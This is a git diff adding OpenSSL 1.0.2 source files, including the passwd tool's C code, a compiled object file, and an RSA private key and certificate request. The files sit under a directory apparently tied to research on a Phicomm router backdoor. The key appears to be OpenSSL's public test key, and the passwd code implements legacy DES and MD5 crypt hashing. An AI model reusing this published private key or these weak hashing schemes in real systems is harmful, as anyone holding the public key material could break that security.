+        if (strcmp(argv[i], "-crypt") == 0)
+            usecrypt = 1;
+        else if (strcmp(argv[i], "-1") == 0)
+            use1 = 1;
+        else if (strcmp(argv[i], "-apr1") == 0)
+            useapr1 = 1;
+        else if (strcmp(argv[i], "-salt") == 0) {
+            if ((argv[i + 1] != NULL) && (salt == NULL)) {
+                passed_salt = 1;
+                salt = argv[++i];
+            } else
+                badopt = 1;
+        } else if (strcmp(argv[i], "-in") == 0) {
+            if ((argv[i + 1] != NULL) && !pw_source_defined) {
+                pw_source_defined = 1;
+                infile = argv[++i];
+            } else
+                badopt = 1;
+        } else if (strcmp(argv[i], "-stdin") == 0) {
+            if (!pw_source_defined) {
+                pw_source_defined = 1;
+                in_stdin = 1;
+            } else
+                badopt = 1;
+        } else if (strcmp(argv[i], "-noverify") == 0)
+            in_noverify = 1;
+        else if (strcmp(argv[i], "-quiet") == 0)
+            quiet = 1;
+        else if (strcmp(argv[i], "-table") == 0)
+            table = 1;
+        else if (strcmp(argv[i], "-reverse") == 0)
+            reverse = 1;
+        else if (argv[i][0] == '-')
+            badopt = 1;
+        else if (!pw_source_defined)
+            /* non-option arguments, use as passwords */
+        {
+            pw_source_defined = 1;
+            passwds = &argv[i];
+            opt_done = 1;
+        } else
+            badopt = 1;
+    }
+
+    if (!usecrypt && !use1 && !useapr1) /* use default */
+        usecrypt = 1;
+    if (usecrypt + use1 + useapr1 > 1) /* conflict */
+        badopt = 1;
+
+    /* reject unsupported algorithms */
+# ifdef OPENSSL_NO_DES
+    if (usecrypt)
+        badopt = 1;
+# endif
+# ifdef NO_MD5CRYPT_1
+    if (use1 || useapr1)
+        badopt = 1;
+# endif
+
+    if (badopt) {
+        BIO_printf(bio_err, "Usage: passwd [options] [passwords]\n");
+        BIO_printf(bio_err, "where options are\n");
+# ifndef OPENSSL_NO_DES
+        BIO_printf(bio_err,
+                   "-crypt             standard Unix password algorithm (default)\n");
+# endif
+# ifndef NO_MD5CRYPT_1
+        BIO_printf(bio_err,
+                   "-1                 MD5-based password algorithm\n");
+        BIO_printf(bio_err,
+                   "-apr1              MD5-based password algorithm, Apache variant\n");
+# endif
+        BIO_printf(bio_err, "-salt string       use provided salt\n");
+        BIO_printf(bio_err, "-in file           read passwords from file\n");
+        BIO_printf(bio_err, "-stdin             read passwords from stdin\n");
+        BIO_printf(bio_err,
+                   "-noverify          never verify when reading password from terminal\n");
+        BIO_printf(bio_err, "-quiet             no warnings\n");
+        BIO_printf(bio_err, "-table             format output as table\n");
+        BIO_printf(bio_err, "-reverse           switch table columns\n");
+
+        goto err;
+    }
+
+    if ((infile != NULL) || in_stdin) {
+        in = BIO_new(BIO_s_file());
+        if (in == NULL)
+            goto err;
+        if (infile != NULL) {
+            assert(in_stdin == 0);
+            if (BIO_read_filename(in, infile) <= 0)
+                goto err;
+        } else {
+            assert(in_stdin);
+            BIO_set_fp(in, stdin, BIO_NOCLOSE);
+        }
+    }
+
+    if (usecrypt)
+        pw_maxlen = 8;
+    else if (use1 || useapr1)
+        pw_maxlen = 256;        /* arbitrary limit, should be enough for most
+                                 * passwords */
+
+    if (passwds == NULL) {
+        /* no passwords on the command line */
+
+        passwd_malloc_size = pw_maxlen + 2;
+        /*
+         * longer than necessary so that we can warn about truncation
+         */
+        passwd = passwd_malloc = OPENSSL_malloc(passwd_malloc_size);
+        if (passwd_malloc == NULL)
+            goto err;
+    }
+
+    if ((in == NULL) && (passwds == NULL)) {
+        /* build a null-terminated list */
+        static char *passwds_static[2] = { NULL, NULL };
+
+        passwds = passwds_static;
+        if (in == NULL)
+            if (EVP_read_pw_string
+                (passwd_malloc, passwd_malloc_size, "Password: ",
+                 !(passed_salt || in_noverify)) != 0)
+                goto err;
+        passwds[0] = passwd_malloc;
+    }
+
+    if (in == NULL) {
+        assert(passwds != NULL);
+        assert(*passwds != NULL);
+
+        do {                    /* loop over list of passwords */
+            passwd = *passwds++;
+            if (!do_passwd(passed_salt, &salt, &salt_malloc, passwd, out,
+                           quiet, table, reverse, pw_maxlen, usecrypt, use1,
+                           useapr1))
+                goto err;
+        }
+        while (*passwds != NULL);
+    } else
+        /* in != NULL */
+    {
+        int done;
+
+        assert(passwd != NULL);
+        do {
+            int r = BIO_gets(in, passwd, pw_maxlen + 1);
+            if (r > 0) {
+                char *c = (strchr(passwd, '\n'));
+                if (c != NULL)
+                    *c = 0;     /* truncate at newline */
+                else {
+                    /* ignore rest of line */
+                    char trash[BUFSIZ];
+                    do
+                        r = BIO_gets(in, trash, sizeof trash);
+                    while ((r > 0) && (!strchr(trash, '\n')));
+                }
+
+                if (!do_passwd(passed_salt, &salt, &salt_malloc, passwd, out,
+                               quiet, table, reverse, pw_maxlen, usecrypt,
+                               use1, useapr1))
+                    goto err;
+            }
+            done = (r <= 0);
+        }
+        while (!done);
+    }
+    ret = 0;
+
+ err:
+    ERR_print_errors(bio_err);
+    if (salt_malloc)
+        OPENSSL_free(salt_malloc);
+    if (passwd_malloc)
+        OPENSSL_free(passwd_malloc);
+    if (in)
+        BIO_free(in);
+    if (out)
+        BIO_free_all(out);
+    apps_shutdown();
+    OPENSSL_EXIT(ret);
+}
+
+# ifndef NO_MD5CRYPT_1
+/*
+ * MD5-based password algorithm (should probably be available as a library
+ * function; then the static buffer would not be acceptable). For magic
+ * string "1", this should be compatible to the MD5-based BSD password
+ * algorithm. For 'magic' string "apr1", this is compatible to the MD5-based
+ * Apache password algorithm. (Apparently, the Apache password algorithm is
+ * identical except that the 'magic' string was changed -- the laziest
+ * application of the NIH principle I've ever encountered.)
+ */
+static char *md5crypt(const char *passwd, const char *magic, const char *salt)
+{
+    /* "$apr1$..salt..$.......md5hash..........\0" */
+    static char out_buf[6 + 9 + 24 + 2];
+    unsigned char buf[MD5_DIGEST_LENGTH];
+    char *salt_out;
+    int n;
+    unsigned int i;
+    EVP_MD_CTX md, md2;
+    size_t passwd_len, salt_len;
+
+    passwd_len = strlen(passwd);
+    out_buf[0] = '$';
+    out_buf[1] = 0;
+    assert(strlen(magic) <= 4); /* "1" or "apr1" */
+    strncat(out_buf, magic, 4);
+    strncat(out_buf, "$", 1);
+    strncat(out_buf, salt, 8);
+    assert(strlen(out_buf) <= 6 + 8); /* "$apr1$..salt.." */
+    salt_out = out_buf + 2 + strlen(magic);
+    salt_len = strlen(salt_out);
+    assert(salt_len <= 8);
+
+    EVP_MD_CTX_init(&md);
+    EVP_DigestInit_ex(&md, EVP_md5(), NULL);
+    EVP_DigestUpdate(&md, passwd, passwd_len);
+    EVP_DigestUpdate(&md, "$", 1);
+    EVP_DigestUpdate(&md, magic, strlen(magic));
+    EVP_DigestUpdate(&md, "$", 1);
+    EVP_DigestUpdate(&md, salt_out, salt_len);
+
+    EVP_MD_CTX_init(&md2);
+    EVP_DigestInit_ex(&md2, EVP_md5(), NULL);
+    EVP_DigestUpdate(&md2, passwd, passwd_len);
+    EVP_DigestUpdate(&md2, salt_out, salt_len);
+    EVP_DigestUpdate(&md2, passwd, passwd_len);
+    EVP_DigestFinal_ex(&md2, buf, NULL);
+
+    for (i = passwd_len; i > sizeof buf; i -= sizeof buf)
+        EVP_DigestUpdate(&md, buf, sizeof buf);
+    EVP_DigestUpdate(&md, buf, i);
+
+    n = passwd_len;
+    while (n) {
+        EVP_DigestUpdate(&md, (n & 1) ? "\0" : passwd, 1);
+        n >>= 1;
+    }
+    EVP_DigestFinal_ex(&md, buf, NULL);
+
+    for (i = 0; i < 1000; i++) {
+        EVP_DigestInit_ex(&md2, EVP_md5(), NULL);
+        EVP_DigestUpdate(&md2, (i & 1) ? (unsigned const char *)passwd : buf,
+                         (i & 1) ? passwd_len : sizeof buf);
+        if (i % 3)
+            EVP_DigestUpdate(&md2, salt_out, salt_len);
+        if (i % 7)
+            EVP_DigestUpdate(&md2, passwd, passwd_len);
+        EVP_DigestUpdate(&md2, (i & 1) ? buf : (unsigned const char *)passwd,
+                         (i & 1) ? sizeof buf : passwd_len);
+        EVP_DigestFinal_ex(&md2, buf, NULL);
+    }
+    EVP_MD_CTX_cleanup(&md2);
+
+    {
+        /* transform buf into output string */
+
+        unsigned char buf_perm[sizeof buf];
+        int dest, source;
+        char *output;
+
+        /* silly output permutation */
+        for (dest = 0, source = 0; dest < 14;
+             dest++, source = (source + 6) % 17)
+            buf_perm[dest] = buf[source];
+        buf_perm[14] = buf[5];
+        buf_perm[15] = buf[11];
+#  ifndef PEDANTIC              /* Unfortunately, this generates a "no
+                                 * effect" warning */
+        assert(16 == sizeof buf_perm);
+#  endif
+
+        output = salt_out + salt_len;
+        assert(output == out_buf + strlen(out_buf));
+
+        *output++ = '$';
+
+        for (i = 0; i < 15; i += 3) {
+            *output++ = cov_2char[buf_perm[i + 2] & 0x3f];
+            *output++ = cov_2char[((buf_perm[i + 1] & 0xf) << 2) |
+                                  (buf_perm[i + 2] >> 6)];
+            *output++ = cov_2char[((buf_perm[i] & 3) << 4) |
+                                  (buf_perm[i + 1] >> 4)];
+            *output++ = cov_2char[buf_perm[i] >> 2];
+        }
+        assert(i == 15);
+        *output++ = cov_2char[buf_perm[i] & 0x3f];
+        *output++ = cov_2char[buf_perm[i] >> 6];
+        *output = 0;
+        assert(strlen(out_buf) < sizeof(out_buf));
+    }
+    EVP_MD_CTX_cleanup(&md);
+
+    return out_buf;
+}
+# endif
+
+static int do_passwd(int passed_salt, char **salt_p, char **salt_malloc_p,
+                     char *passwd, BIO *out, int quiet, int table,
+                     int reverse, size_t pw_maxlen, int usecrypt, int use1,
+                     int useapr1)
+{
+    char *hash = NULL;
+
+    assert(salt_p != NULL);
+    assert(salt_malloc_p != NULL);
+
+    /* first make sure we have a salt */
+    if (!passed_salt) {
+# ifndef OPENSSL_NO_DES
+        if (usecrypt) {
+            if (*salt_malloc_p == NULL) {
+                *salt_p = *salt_malloc_p = OPENSSL_malloc(3);
+                if (*salt_malloc_p == NULL)
+                    goto err;
+            }
+            if (RAND_pseudo_bytes((unsigned char *)*salt_p, 2) < 0)
+                goto err;
+            (*salt_p)[0] = cov_2char[(*salt_p)[0] & 0x3f]; /* 6 bits */
+            (*salt_p)[1] = cov_2char[(*salt_p)[1] & 0x3f]; /* 6 bits */
+            (*salt_p)[2] = 0;
+#  ifdef CHARSET_EBCDIC
+            ascii2ebcdic(*salt_p, *salt_p, 2); /* des_crypt will convert back
+                                                * to ASCII */
+#  endif
+        }
+# endif                         /* !OPENSSL_NO_DES */
+
+# ifndef NO_MD5CRYPT_1
+        if (use1 || useapr1) {
+            int i;
+
+            if (*salt_malloc_p == NULL) {
+                *salt_p = *salt_malloc_p = OPENSSL_malloc(9);
+                if (*salt_malloc_p == NULL)
+                    goto err;
+            }
+            if (RAND_pseudo_bytes((unsigned char *)*salt_p, 8) < 0)
+                goto err;
+
+            for (i = 0; i < 8; i++)
+                (*salt_p)[i] = cov_2char[(*salt_p)[i] & 0x3f]; /* 6 bits */
+            (*salt_p)[8] = 0;
+        }
+# endif                         /* !NO_MD5CRYPT_1 */
+    }
+
+    assert(*salt_p != NULL);
+
+    /* truncate password if necessary */
+    if ((strlen(passwd) > pw_maxlen)) {
+        if (!quiet)
+            /*
+             * XXX: really we should know how to print a size_t, not cast it
+             */
+            BIO_printf(bio_err,
+                       "Warning: truncating password to %u characters\n",
+                       (unsigned)pw_maxlen);
+        passwd[pw_maxlen] = 0;
+    }
+    assert(strlen(passwd) <= pw_maxlen);
+
+    /* now compute password hash */
+# ifndef OPENSSL_NO_DES
+    if (usecrypt)
+        hash = DES_crypt(passwd, *salt_p);
+# endif
+# ifndef NO_MD5CRYPT_1
+    if (use1 || useapr1)
+        hash = md5crypt(passwd, (use1 ? "1" : "apr1"), *salt_p);
+# endif
+    assert(hash != NULL);
+
+    if (table && !reverse)
+        BIO_printf(out, "%s\t%s\n", passwd, hash);
+    else if (table && reverse)
+        BIO_printf(out, "%s\t%s\n", hash, passwd);
+    else
+        BIO_printf(out, "%s\n", hash);
+    return 1;
+
+ err:
+    return 0;
+}
+#else
+
+int MAIN(int argc, char **argv)
+{
+    fputs("Program not available.\n", stderr)
+        OPENSSL_EXIT(1);
+}
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/passwd.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/passwd.o
new file mode 100644
index 0000000000000000000000000000000000000000..8d4fe6ce4ba45a7d6d1e5ba3dc16a19be118a9c9
GIT binary patch
literal 13640
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
T;q;!!o=+?&%b*wuR{Q?}-mnfs

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/pca-cert.srl b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/pca-cert.srl
new file mode 100644
index 0000000..2c7456e
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/pca-cert.srl
@@ -0,0 +1 @@
+07
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/pca-key.pem b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/pca-key.pem
new file mode 100644
index 0000000..20029ab
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/pca-key.pem
@@ -0,0 +1,15 @@
+-----BEGIN RSA PRIVATE KEY-----
+MIICXAIBAAKBgQCdoWk/3+WcMlfjIrkg40ketmnQaEogQe1LLcuOJV6rKfUSAsPg
+wgsabJ/wn8TxA1yy3eKJbFl3OiUXMRsp22Jp85PmemiDzyUIStwk72qhp1imbANZ
+vlmlCFKiQrjUyuDfu4TABmn+kkt3vR1YBEOGt+IFye1UBVSATVdRJ2UVhwIDAQAB
+AoGAba4fTtuap5l7/8ZsbE7Z1O32KJY4ZcOZukLOLUUhXxXduT+FTgGWujc0/rgc
+z9qYCLlNZHOouMYTgtSfYvuMuLZ11VIt0GYH+nRioLShE59Yy+zCRyC+gPigS1kz
+xvo14AsOIPYV14Tk/SsHyq6E0eTk7VzaIE197giiINUERPECQQDSKmtPTh/lRKw7
+HSZSM0I1mFWn/1zqrAbontRQY5w98QWIOe5qmzYyFbPXYT3d9BzlsMyhgiRNoBbD
+yvohSHXJAkEAwAHx6ezAZeWWzD5yXD36nyjpkVCw7Tk7TSmOceLJMWt1QcrCfqlS
+xA5jjpQ6Z8suU5DdtWAryM2sAir1WisYzwJAd6Zcx56jvAQ3xcPXsE6scBTVFzrj
+7FqZ6E+cclPzfLQ+QQsyOBE7bpI6e/FJppY26XGZXo3YGzV8IGXrt40oOQJALETG
+h86EFXo3qGOFbmsDy4pdP5nBERCu8X1xUCSfintiD4c2DInxgS5oGclnJeMcjTvL
+QjQoJCX3UJCi/OUO1QJBAKgcDHWjMvt+l1pjJBsSEZ0HX9AAIIVx0RQmbFGS+F2Q
+hhu5l77WnnZOQ9vvhV5u7NPCUF9nhU3jh60qWWO8mkc=
+-----END RSA PRIVATE KEY-----
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/pca-req.pem b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/pca-req.pem
new file mode 100644
index 0000000..33f1553
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/pca-req.pem
@@ -0,0 +1,11 @@
+-----BEGIN CERTIFICATE REQUEST-----
+MIIBmjCCAQMCAQAwXDELMAkGA1UEBhMCQVUxEzARBgNVBAgTClF1ZWVuc2xhbmQx
+GjAYBgNVBAoTEUNyeXB0U29mdCBQdHkgTHRkMRwwGgYDVQQDExNUZXN0IFBDQSAo
+MTAyNCBiaXQpMIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCdoWk/3+WcMlfj
+Irkg40ketmnQaEogQe1LLcuOJV6rKfUSAsPgwgsabJ/wn8TxA1yy3eKJbFl3OiUX
+MRsp22Jp85PmemiDzyUIStwk72qhp1imbANZvlmlCFKiQrjUyuDfu4TABmn+kkt3
+vR1YBEOGt+IFye1UBVSATVdRJ2UVhwIDAQABMA0GCSqGSIb3DQEBBAUAA4GBAEzz
+IG8NnfpnPTQSCN5zJhOfy6p9AcDyQzuJirYv1HR/qoYWalPh/U2uiK0lAim7qMcv
+wOlK3I7A8B7/4dLqvIqgtUj9b1WT8zIrnwdvJI4osLI2BY+c1pVlp174DHLMol1L
+Cl1e3N5BTm7lCitTYjuUhsw6hiA8IcdNKDo6sktV
+-----END CERTIFICATE REQUEST-----
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/pkcs12.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/pkcs12.c
new file mode 100644
index 0000000..4ff6449
--- /dev/null
